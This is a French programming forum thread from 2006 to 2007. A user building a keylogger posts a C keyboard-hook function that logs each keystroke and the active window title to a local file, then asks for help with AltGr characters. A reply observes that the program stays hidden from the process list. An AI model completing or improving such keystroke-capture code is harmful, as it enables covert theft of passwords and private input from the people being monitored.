begin process at 2010 02 10 03:22:00
  Trouver un code source :

dans

Accueil > Forum > 

C

> 

Windows

> 

System

> 

hook clavier

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

hook clavier

mercredi 13 septembre 2006 à 15:45:37 | hook clavier

deck_bsd

Membre Club
Yop,

Bon dernière question de la journée :p enfin j'espère. Et la je sèche vraiment.

En claire, je fait un keylogger, pour se faire un hook clavier s'impose. Bon il fonction a merveil sauve pour UNE touche :s c'est celle juste à côté du P . En faite lorsque le hook est activer et que je veu taper le caractère [ et bien juste après celui-ci vient se mettre le caratère ^. En claire lorsque je tape [ j'obtient [^ , et ? ne fonctionne plus non plus. Et la je voi pas du tout de ou cela peut venir. Voici ma fonction pour l'interception des touche :

void InterceptKey(int code,WPARAM wParam,LPARAM lParam){
    char szCurrentWindow[MAX_PATH];
    FILE * log_file;

log_file = fopen("c:\\KbF.log","a+");

GetWindowText(GetActiveWindow(),szCurrentWindow,MAX_PATH-1);
    if(strcmp(szLastWindow,szCurrentWindow)){
        fprintf(log_file,"\n\n-- new window\n");
        strcpy(szLastWindow,szCurrentWindow);
        fprintf(log_file,szCurrentWindow);
        fprintf(log_file,"\n-- keys \n");
    }

switch(wParam){
        case VK_RETURN:
        fprintf(log_file,"\n");
        break;
    case VK_CONTROL:
        fprintf(log_file,"[CTRL]");
        break;
    case VK_MENU:
        fprintf(log_file,"[ALT]");
        break;
    case VK_DELETE:
        fprintf(log_file,"[DEL]");
        break;
    case VK_BACK:
        fprintf(log_file,"[<==]");
        break;
    case VK_TAB:
        fprintf(log_file,"[TAB]");
        break;
    case VK_SHIFT:
        fclose(log_file);
        return;
        break;
    default:{
        BYTE byKeyBState[256];

GetKeyboardState(byKeyBState);

WORD wChar; /* Varaible qui va recevoir le code Ascii de la touche. */
        UINT uiScanCode = 0;

ToAscii(wParam,uiScanCode,byKeyBState,&wChar,0);
        fprintf(log_file,"%c",(char)wChar);
    }
        break;
  }
  fclose(log_file);
}

J'espère vraiment que quelqu'un peut m'aider ou me donner une autre solution pour intercepter les touches.

Merci d'avance.
mercredi 13 septembre 2006 à 17:12:21 | Re : hook clavier

deck_bsd

Membre Club
Je vien de m'apercevoir que c'est lorsque l'on presse la touche ALT Gr que cela pose problème, quelqu'un voi une solution ?
mardi 6 février 2007 à 14:10:33 | Re : hook clavier

kerneltony95

ta oublié de declarer szLastWindow

Have Fun !
mardi 6 février 2007 à 14:33:51 | Re : hook clavier

kerneltony95

parcontre je comprendr il s' affiche pas dans les processus
Have Fun !
mardi 6 février 2007 à 14:34:21 | Re : hook clavier

kerneltony95

parcontre je comprend pas il s' affiche pas dans les processus
Have Fun !

Cette discussion est classée dans : file, case, log, break, fprintf

Répondre à ce message

Sujets en rapport avec ce message

[Hook Clavier] Pb d'accents circonflexes [ par BeLZeL ] J'ai fait un programme simple dont le but est de faire un hook clavier global, et de tout mettre dans un fichier log.Tout fonctionne, sauf une chose, utiliser une string avec switch/case [ par potimarara ] Salut a tous,J ai le code suivant qui a partir de un nom de ficher (avec extension) me renvoir un content-type.Le probleme est que lorsque j extrais l fichier de log [ par unlimited72 ] Bonjour,J'ai un petit soucis, je souhaite faire des stats dans mes méthodes pour cela j'ai crée un fichier de log (LogPerf), lequel j'appel a chaque e Timer [ par youri01 ] salut,j'ai un ptit problème avec le timer je n'arrive pas à le faire fonctionner. dans la "WindowsProcedure" je mets :switch (message)              {  keylogger [ par rebelattack ] Bonjour, je souhaiterais surveillé les activité de mon fils sur le net, pour cela j'ai pensé a un keylogger. J'ai récupperé un code C sur votre site : code ascii [ par tasken2 ] bonjour à tous  et merci d'avoir cliquez sur moi .Alors voila j'ai un probleme pour récuperer la valeur du code ascii dun caractere speciaux mais le r Problème avec un switch en C [ par alexis69 ] Alors voilà. J'ai coder un petit code avec un menu. À la fin de mon switch j'ai ajouté l'option default comme ça si une personne tape autre chose que Eternel problème... [ par dayvid75014 ] Bonjour à tous, Voici un ptit bout de code, ayant pour but de récupérer un flux en héxa d'un fichier MPEG et d'en tirer des informations (en-tête, SDL porbleme [ par fahdovski ] IL Y'A EXECUTION MAIS LE PC PLANTE IL DEVIENT TRES LENT, MAIS POURQUOI??????jE TRAVAILLE SUR CODE::BLOCKS SOUS LINUXAVANT CA MARCHAIS IMPEC QUESQUI C'

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,468 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales